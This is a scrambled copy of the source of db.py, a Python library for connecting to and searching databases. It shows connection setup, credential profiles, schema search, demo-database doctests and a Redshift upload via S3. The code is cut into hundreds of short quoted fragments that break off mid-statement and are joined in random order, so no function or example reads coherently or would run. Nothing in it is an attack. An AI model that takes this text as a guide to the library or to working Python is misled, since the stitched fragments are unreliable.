Parameters ----------- search: str glob pattern for what you're looking", "| INTEGER | | InvoiceLine | InvoiceId | INTEGER | | MediaType |", "InvoiceLine | InvoiceLineId | INTEGER | | InvoiceLine | InvoiceId | INTEGER |", "2 Balls to the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r", "0.99 1 5510424 0.99 2 3990994 0.99 3 4331779 0.99 4 6290521 0.99", ">>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort in some way for all", "data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q,", "via s3. Parameters ---------- name: str name for your shiny new table df:", "True except ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except", "Those About To Rock We Salute You 9 For Those About To Rock", "= load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables: profile['metadata'] = True else:", "db.find_table(\"tmp*\") # returns all tables prefixed w/ tmp >>> results = db.find_table(\"prod_*\") #", "the bucket sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list(): key.delete() if not s3_bucket:", "have an \"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column", "name in dict for (table_schema, table_name, column_name, data_type) in cols: if table_name not", "= fp.read() return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite doesn't come", "== 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype,", "dbtype not in (\"sqlite\", \"mssql\") and username is None: self.load_credentials(profile) if cache: self._metadata_cache", "executed bucket_location: boto.s3.connection.Location a specific AWS location in 
which to create the temporary", "Balls to the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0", "database credentials / profile for how you like your queries exclude_system_tables: bool Whether", "e: print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def", "in self.tables: for col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table,", "type not specified! Must select one of: postgres, sqlite, mysql, mssql, or redshift\")", "for mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import", "if isinstance(data, list): query = [template(item) for item in data] query = [str(item)", "told to use cached metadata if use_cache and self._metadata_cache: sys.stderr.write(\"Loading cached metadata. Please", "self.con.commit() sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing down bucket...\") for key in", "user = os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID + name) else: f", "port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db = DB(username=\"fozzybear\",", "for col in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column)", "from collections import defaultdict import pandas as pd import pybars from .column import", "profile=\"default\"): \"\"\"Save the database credentials, plus the database properties to your db.py profile.\"\"\"", "6 7 Let's Get It Up 1 1 7 8 Inject The Venom", "TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif", "HAS_PYMSSQL = True except ImportError: 
HAS_PYMSSQL = False DBPY_PROFILE_ID = \".db.py_\" S3_PROFILE_ID =", "try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except", "= pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", port=self.port, database=self.dbname or '',", "is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or", "say this a secure way to store sensitive data, but it will probably", "8 Snowballed 0.99 9 Evil Walks 0.99 >>> template = ''' ... SELECT", "0.99 2 Fast As a Shark 0.99 3 Restless and Wild 0.99 4", "values('{0}', '{1}', '{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';\") #", "'{2}');\".format(*row)) self.cur.execute(\"SELECT name, sql FROM sqlite_master where sql like '%REFERENCES%';\") # find for", "faster if chunks = multiple-of-slices. Ex: DW1.XL nodes have 2 slices per node,", "dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db import DemoDB >>> db", "username: str Your username for the database password: str Your password for the", "JOIN ... Track t ... on a.AlbumId = t.AlbumId; ... 
''' >>> with", "True else: profile['metadata'] = False profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False):", "0.99 8 Snowballed 0.99 9 Evil Walks 0.99 \"\"\" with open(filename) as fp:", "return self._tables def __str__(self): return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname)", "ensure it is installed\") if s3 is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY", "column_name, data_type) in cols: if table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con,", "Cooper style.) keys_per_column: int, None Default number of keys to display in the", "top {limit} * from ({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data,", "DataFrame data frame you want to save to the db drop_if_exists: bool (False)", "raise Exception(\"Credentials not configured!\") def save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials so", "Number of DataFrame chunks to upload and COPY from S3. Upload speed is", "db.find_column(\"Name\") # returns all columns named \"Name\" +-----------+-------------+---------------+ | Table | Column Name", "data=data) table_name cnt 0 Album 347 1 Artist 275 2 Track 3503 >>>", "because we're # lazily importing boto only if necessary here. if bucket_location is", "db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists all of the database profiles available", "-------- >>> from db import DemoDB >>> db = DemoDB() db.query(\"select * from", "in cols: if table_name not in tables: tables[table_name] = [] tables[table_name].append(Column(self.con, self._query_templates, table_schema,", "AWS_ACCESS_KEY as either function argument or as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY", "location=bucket_location) # we're going to chunk the file into pieces. 
according to amazon,", "have verrrrrrrry wide columns in some cases. driver: str, None Driver for mssql/pyodbc", "i threads = [] for i in chunks: t = threading.Thread(target=upload_chunk, args=(i, ))", "threads.append(t) # join all threads for t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists:", "or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if '\\\\' in self.hostname:", "dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f = profile_path(DBPY_PROFILE_ID, profile) if f: prof =", "Rock We Salute You 1 Balls to the Wall 2 Restless and Wild", "or redshift\") self._use_cache = cache if dbtype not in (\"sqlite\", \"mssql\") and username", "9 1 <NAME>, <NAME>, <NAME> 263497 Bytes UnitPrice 0 11170334 0.99 1 5510424", "down the bucket sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list(): key.delete() if not", "range(0, len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k", "{} user = os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user,", "db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\", driver=\"{FreeTDS}\") from db import DB try: __import__('imp').find_module('psycopg2') db =", "keys_per_column self.driver = driver if self.dbtype is None: raise Exception(\"Database type not specified!", "fp: q = fp.read() return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\" SQLite", "---------- profile: str (optional) identifier/name for your database (i.e. 
\"dw\", \"prod\") \"\"\" f", "& sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]: if limit: q =", "Rock We Salute You 9 For Those About To Rock We Salute You", "(i, i + chunk_size) k.set_metadata('parent', 'db.py') out = StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as", "k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i threads = [] for i in chunks: t =", "= df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' % (i, i + chunk_size)", "1 <NAME>, <NAME>, <NAME> 343719 11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice", "| +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have an \"e\" and", "arg==\"hostname\": arg = \"host\" creds[arg] = value self.con = mysql_connect(**creds) self.con.autocommit(True) self.cur =", "raise Exception(\"Couldn't find boto library. Please ensure it is installed\") if s3 is", "and querying a database. Parameters ---------- username: str Your username for the database", "import threading import glob import gzip try: from StringIO import StringIO # Python", "1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY) if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) self.con.commit()", "limit=limit) return q # mssql else: if limit: q = \"select top {limit}", "Parameters ----------- search: str glob pattern for what you're looking for Examples ----------", "6 7636561 0.99 7 6852860 0.99 8 6599424 0.99 9 8611245 0.99 >>>", "---------- name: str name for your shiny new table df: DataFrame data frame", "bucket_location=None, s3_bucket=None): \"\"\" Upload a dataframe to redshift via s3. 
Parameters ---------- name:", "in self.cur.execute(\"select name from sqlite_master where type='table';\")] for table in tables: for row", "= DB(profile=\"staging\") >>> from db import DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test')", "warnings? try: import psycopg2 as pg HAS_PG = True except ImportError: HAS_PG =", "is None: continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table,", "records to return in a query. This is used by the DB.query method.", "AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' % (i, i", "os.path.join(user, DBPY_PROFILE_ID + name) try: try: open(f) except: raise Exception(\"Profile '{0}' does not", "4 Princess of the Dawn 0.99 5 Put The Finger On You 0.99", "so if running 2 nodes you will want chunk_size=4, 8, etc AWS_ACCESS_KEY: str", "self.dbname, \"dbtype\": self.dbtype, \"schemas\": self.schemas, \"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search):", "# 3. use the naive approach if use_cache: # generate our Tables, and", "dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username", "AWS_ACCESS_KEY = os.environ.get('AWS_ACCESS_KEY') if AWS_SECRET_KEY is None: AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is", "Title ArtistId 0 1 For Those About To Rock We Salute You 1", "as fp: q = fp.read() return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self): \"\"\"", "the function will try and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str", "DB See http://chinookdatabase.codeplex.com/ for more info. 
\"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT,", "self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def save_credentials(self,", "5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\",", "template = self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for item in data]", "port: int Port the database is running on. defaults to default port for", "GenreId | INTEGER | | Invoice | InvoiceId | INTEGER | | Invoice", "You) 1 1 1 2 Balls to the Wall 2 2 2 3", "rendering of PrettyTable a bit. None means that you'll have verrrrrrrry wide columns", "AWS_SECRET_KEY = os.environ.get('AWS_SECRET_KEY') if AWS_ACCESS_KEY is None: raise Exception(\"Must specify AWS_ACCESS_KEY as either", "# returns all columns containing Address +----------+----------------+--------------+ | Table | Column Name |", "None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur: # second value", "include \"system\" tables (the ones that the database needs in order to operate).", "search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively search through your", "self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def", "return \"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__()", "making doctest fail. 
db.find_column(\"Name\") # returns all columns named \"Name\" +-----------+-------------+---------------+ | Table", "AlbumId Title ArtistId 0 1 For Those About To Rock We Salute You", "not in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col)) return ColumnSet(cols) def", "by the DB.query method. You can override it by adding limit={X} to the", "str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in self.cur: # second value in", "# returns all columns have an \"e\" and are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+", "False try: import pyodbc as pyo HAS_ODBC = True except ImportError: try: import", "None return { \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname, \"port\": self.port, \"filename\": db_filename,", "Name of the database schemas: list List of schemas to include. Defaults to", "ones that the database needs in order to operate). This includes things like", "| +--------+--------------------------+ | Album | AlbumId, Title, ArtistId | | Artist | ArtistId,", "name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list) for rel in self.cur: # second value", "arg = \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg = \"host\"", "password=<PASSWORD>, database=self.dbname) self.cur = self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars =", "| | Track | MediaTypeId | INTEGER | | Track | Milliseconds |", "table if exists tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar,", "if boto is present, set the bucket_location to default. 
# we can't do", "GenreId Composer Milliseconds Bytes \\\\\\r 0 1 <NAME>, <NAME>, <NAME> 343719 11170334 1", "= ''' ... SELECT ... a.Title, ... t.Name, ... t.UnitPrice ... FROM ...", "... table_name ... ''' >>> data = [ ... {\"name\": \"Album\"}, ... {\"name\":", "sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP TABLE IF EXISTS {0};\".format(name) if print_sql: sys.stderr.write(sql", "BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have", "\\\\\\r 0 1 For Those About To Rock (We Salute You) 1 1", "... ''' >>> data = [ ... {\"name\": \"Album\"}, ... {\"name\": \"Artist\"}, ...", "elif self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or", "varchar);\") foreign_keys = [] self.cur.execute(\"SELECT name, sql FROM sqlite_master ;\") for (table_name, sql)", "| Track | AlbumId | INTEGER | | Track | MediaTypeId | INTEGER", "db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have an \"e\" and are NVARCHAR(70)S", "file {1}\".format(name, f)) os.remove(f) except Exception as e: raise Exception(\"Could not remove profile", "exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A lazy loaded reference to the", "hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\",", "DataFrame chunks to upload and COPY from S3. 
Upload speed is *much* faster", "Wild 4 Restless and Wild 5 For Those About To Rock We Salute", "value in relationship tuple is the table name table_db_foreign_keys[rel[1]].append(rel) self.cur.execute(self._query_templates['system']['ref_keys_for_db']) table_db_ref_keys = defaultdict(list)", "a Shark 3 2 3 4 Restless and Wild 3 2 4 5", "return col_meta, table_meta def _gen_tables_from_col_tuples(self, cols): tables = {} # generate our Columns,", "for your database (i.e. \"dw\", \"prod\") \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) if f:", "Please ensure it is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit", "is not None: AWS_ACCESS_KEY = s3.access_key AWS_SECRET_KEY = s3.secret_key if AWS_ACCESS_KEY is None:", "the Dawn 0.99 5 Put The Finger On You 0.99 6 Let's Get", "None: raise Exception(\"Database type not specified! Must select one of: postgres, sqlite, mysql,", "except ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\", port=None, filename=None, dbname=None, dbtype=None,", "print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000,", "chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>' % (i, i +", "of DataFrame chunks to upload and COPY from S3. Upload speed is *much*", "in the foreign and reference keys. 
This is used to control the rendering", "= query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find psycopg2", "self.load_credentials(profile) if cache: self._metadata_cache = self.load_metadata(profile) else: self.username = username self.password = password", "\"localhost\", port=self.port, database=self.dbname or '', uid=self.username, pwd=<PASSWORD>) self.cur = self.con.cursor() elif HAS_PYMSSQL: if", "Loads crentials for a given profile. Profiles are stored in ~/.db.py_{profile_name} and are", "HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or", "creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else: raise Exception(\"Credentials not configured!\") def", "= DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+ | Album", "self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find for table and column names self.cur.execute(\"drop", "schema. Please wait...\") if self.schemas is not None and isinstance(self.schemas, list) and 'schema_specified'", "alternative to using keys, you can use an S3 object print_sql: bool (False)", "| Artist | ArtistId | INTEGER | | Customer | SupportRepId | INTEGER", "Employee | Address | NVARCHAR(70) | | Genre | GenreId | INTEGER |", "q.rstrip().rstrip(\";\") q = \"select * from ({q}) q limit {limit}\".format(q=q, limit=limit) return q", "INTEGER | | Customer | CustomerId | INTEGER | | Employee | ReportsTo", "ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema,", "should match your redshift cluster's region. 
Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry,", "| MediaTypeId | INTEGER | | Track | GenreId | INTEGER | +---------------+---------------+---------+", "for table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self, search,", "try: import psycopg2 as pg HAS_PG = True except ImportError: HAS_PG = False", "for t in sorted(tables.keys())]) sys.stderr.write(\"done!\\n\") def _get_db_metadata(self, exclude_system_tables, use_cache): col_meta = [] table_meta", "it one time, database-wide, if query is available elif not use_cache and isinstance(self._query_templates.get('system',", "for exploring and querying a database. Parameters ---------- username: str Your username for", "your aws secrety key. if this is None, the function will try and", "# pull out column metadata for all tables as list of tuples if", "\"\"\" Aggresively search through your database's schema for a column. Parameters ----------- search:", "You 1 Balls to the Wall 2 Restless and Wild 3 Restless and", "in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if sql is", "if print_sql: sys.stderr.write(sql + \"\\n\") self._try_command(sql) # generate schema from pandas and then", "---------- >>> from db import DemoDB >>> db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5", "None 342562 2 1 <NAME>, <NAME>, U. Dirkscneider & W. Ho... 230619 3", "0 1 For Those About To Rock We Salute You 1 1 2", "{\"name\": \"Artist\"}, ... {\"name\": \"Track\"} ... 
] >>> db.query(q, data=data) table_name cnt 0", "5432 elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port = 3306 elif dbtype==\"sqlite\":", "are varchars +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+ |", "are NVARCHAR(70)S or INTEGERS +-------------+----------------+--------------+ | Table | Column Name | Type |", "We Salute You 1 Balls to the Wall 2 Restless and Wild 3", "tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema # 1. load directly", "you don't have to save them in script. Parameters ---------- profile: str (optional)", "s3. Parameters ---------- name: str name for your shiny new table df: DataFrame", "UnitPrice 0 0.99 1 0.99 db.query(\"select * from Track\", limit=10) TrackId Name AlbumId", "S3Connection from boto.s3.key import Key from boto.s3.connection import Location # if boto is", "database with a raw string. Parameters ---------- q: str Query string to execute", "None, the function will try and grab AWS_SECRET_KEY from your environment variables s3:", "= self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema #", "search): if data_type and isinstance(getattr(table, col), Column) and getattr(table, col).type not in data_type:", "bucket = conn.get_bucket(s3_bucket) bucket_name = s3_bucket else: bucket = conn.create_bucket(bucket_name, location=bucket_location) # we're", "tables = [] for table in self.tables: if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables)", "column_name, foreign_table, foreign_key)) for row in foreign_keys: sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name,", "returns all columns containing Address that are varchars +----------+----------------+--------------+ | Table | Column", "query the system tables. 
limit: int, None Default number of records to return", "self._metadata_cache = self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if cache: self._metadata_cache", "elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for", "DemoDB >>> db = DemoDB() >>> db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f,", "cols.append(getattr(table, col)) return ColumnSet(cols) def _assign_limit(self, q, limit=1000): # postgres, mysql, & sqlite", "INTEGER | | Playlist | PlaylistId | INTEGER | | PlaylistTrack | TrackId", "limit=1000): # postgres, mysql, & sqlite if self.dbtype in [\"postgres\", \"redshift\", \"sqlite\", \"mysql\"]:", "= \"\\n\".join(query) elif isinstance(data, dict): query = template(data) query = str(query) else: return", "continue for (column_name, foreign_table, foreign_key) in re.findall(rgx, sql): foreign_keys.append((table_name, column_name, foreign_table, foreign_key)) for", "import DB import pymysql db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db", "Aggresively search through your database's schema for a table. Parameters ----------- search: str", "Playlist | Name | NVARCHAR(120) | | Track | Name | NVARCHAR(200) |", "sys.stderr.write(\"done!\\n\") # tear down the bucket sys.stderr.write(\"Tearing down bucket...\") for key in bucket.list():", "# generate our Tables, and load them into a TableSet self._tables = TableSet([Table(self.con,", "db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass \"\"\" def __init__(self, username=None, password=<PASSWORD>, hostname=\"localhost\",", "''' >>> data = [ ... {\"name\": \"Album\"}, ... 
{\"name\": \"Artist\"}, ... {\"name\":", "SQLite format. need to convert it to Postgres sql = sql.replace(\"[\", \"\").replace(\"]\", \"\")", "mssql else: if limit: q = \"select top {limit} * from ({q}) q\".format(limit=limit,", "some way for all those doctests to be viable... -= if not, there's", "creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit')", "Invoice | CustomerId | INTEGER | | InvoiceLine | TrackId | INTEGER |", "and grab AWS_SECRET_KEY from your environment variables s3: S3 alternative to using keys,", "feature only available for redshift.\") try: from boto.s3.connection import S3Connection from boto.s3.key import", "db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from", "row in self.cur.execute(\"select name from sqlite_master where type='table';\")] for table in tables: for", "= unicode(q) template = self.handlebars.compile(q) if isinstance(data, list): query = [template(item) for item", "1 6 7 Let's Get It Up 1 1 7 8 Inject The", "import defaultdict import pandas as pd import pybars from .column import Column, ColumnSet", "INTEGER | | MediaType | MediaTypeId | INTEGER | | Track | MediaTypeId", "| | InvoiceLine | TrackId | INTEGER | | InvoiceLine | InvoiceLineId |", ") or \"{}{}\".format(base_con, \"Trusted_Connection=Yes;\")) try: self.con = pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con", "= filename self.dbname = dbname self.dbtype = dbtype self.schemas = schemas self.limit =", "query(self, q, data=None, union=True, limit=None): \"\"\" Query your database with a raw string.", "table name in dict for (table_schema, table_name, column_name, data_type) in cols: if table_name", "= StringIO() with gzip.GzipFile(fileobj=out, mode=\"w\") as f: f.write(chunk.to_csv(index=False, 
encoding='utf-8')) k.set_contents_from_string(out.getvalue()) sys.stderr.write(\".\") return i", ">>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table | Columns | +--------+--------------------------+", "from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP; \"\"\".format(name=name, bucket_name=bucket_name, AWS_ACCESS_KEY=AWS_ACCESS_KEY, AWS_SECRET_KEY=AWS_SECRET_KEY)", "self.to_dict()) @property def credentials(self): \"\"\"Dict representation of all credentials for the database.\"\"\" if", "table in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1], row[2])) # find", "| Table | Column Name | Type | +-----------+-------------+---------------+ | Artist | Name", "\"\"\" profiles = {} user = os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"):", "data=None, union=True, limit=None): \"\"\" Query your database from a file. Parameters ---------- filename:", "driver: str, None Driver for mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\", dbtype=\"mssql\",", "1 <NAME>, <NAME>, <NAME> 205662 6 1 <NAME>, <NAME>, <NAME> 233926 7 1", "raise Exception(\"Profile '{0}' does not exist. 
Could not find file {1}\".format(name, f)) os.remove(f)", "HAS_MYSQL = True except ImportError: HAS_MYSQL = False try: import sqlite3 as sqlite", "NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns have an \"e\"", "in dict for (table_schema, table_name, column_name, data_type) in cols: if table_name not in", "= self.load_metadata(profile) elif dbtype==\"sqlite\" and filename is None: self.load_credentials(profile) if cache: self._metadata_cache =", "for the database password: str Your password for the database hostname: str Hostname", "def save_credentials(self, profile=\"default\"): \"\"\" Save your database credentials so you don't have to", "and getattr(table, col).type not in data_type: continue if isinstance(getattr(table, col), Column): cols.append(getattr(table, col))", "sql_insert = \"insert into tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row))", "5432, u'username': None}, 'muppets': {u'dbname': u'muppetdb', u'dbtype': u'postgres', u'filename': None, u'hostname': u'muppets.yhathq.com', u'password':", "q, data=None, union=True, limit=None): \"\"\" Query your database with a raw string. Parameters", "\"\"\"A lazy loaded reference to the table metadata for the DB.\"\"\" if len(self._tables)", "not HAS_PG: raise Exception(\"Couldn't find psycopg2 library. Please ensure it is installed\") self.con", "in vars(table): if glob.fnmatch.fnmatch(col, search): if data_type and isinstance(getattr(table, col), Column) and getattr(table,", "Walks 0.99 >>> template = ''' ... SELECT ... '{{ name }}' as", "0 For Those About To Rock (We Salute You) 0.99 1 Balls to", "HAS_PG = False try: import MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True except", "if necessary here. 
if bucket_location is None: bucket_location = Location.DEFAULT except ImportError: raise", "tmp_dbpy_foreign_keys;\") self.cur.execute(\"create temp table tmp_dbpy_foreign_keys(table_name varchar, column_name varchar, foreign_table varchar, foreign_column varchar);\") foreign_keys", "chunks: t = threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all threads for", "that there will be no limit (That's right, you'll be limitless. Bradley Cooper", "as e: raise Exception(\"Could not remove profile {0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None,", "remove profile {0}! Excpetion: {1}\".format(name, e)) def DemoDB(keys_per_column=None, **kwargs): \"\"\" Provides an instance", "and then adapt for redshift sql = pd.io.sql.get_schema(df, name) # defaults to using", "where type='table';\")] for table in tables: for row in self.cur.execute(\"pragma table_info('{0}')\".format(table)): rows_to_insert.append((table, row[1],", "a db admin you might actually want to query the system tables. limit:", "from .query_templates import query_templates # attempt to import the relevant database libraries #", "password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\", dbtype=\"postgres\") db", 